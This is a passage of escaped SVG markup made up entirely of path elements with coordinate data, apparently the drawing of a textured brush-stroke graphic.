d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path 